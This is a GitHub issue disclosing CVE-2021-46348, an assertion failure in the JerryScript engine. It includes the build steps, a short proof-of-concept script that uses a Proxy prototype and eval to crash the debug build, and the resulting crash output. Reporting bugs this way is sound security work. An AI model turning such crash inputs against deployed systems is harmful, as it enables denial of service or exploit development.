CVE-2021-46348: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77. · Issue #4941 · jerryscript-project/jerryscript

There is an assertion failure, 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)', at /jerry-core/ecma/base/ecma-literal-storage.c in JerryScript 3.0.0.


JerryScript revision

Commit: a6ab5e9

Version: v3.0.0

Build platform

Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64)

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

Test case

poc.js

var a = new Array(286331153, 572662306, 858993459, 1145324612, 303174162, 589505315, 305419888, 30583);
var handler = {
    getPrototypeOf: function (target, name) {
        return a;
    }
};
var p = new Proxy([], handler);
var b = [
    {},
    [],
    'natalie'
];
__proto__.__proto__ = p;
eval("function test_configurable_accessor() { print('replacement'); }");
[].flat.call(b);

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js

Unhandled exception:
0: <eval>:1:64
1: poc.js:14:1
ICE: Assertion 'ECMA_STRING_IS_REF_EQUALS_TO_ONE (string_p)' failed at jerryscript/jerry-core/ecma/base/ecma-literal-storage.c(ecma_free_string_list):77.
Error: ERR_FAILED_INTERNAL_ASSERTION
[1] 987 abort jerry poc.js

Credits: Found by OWL337 team.
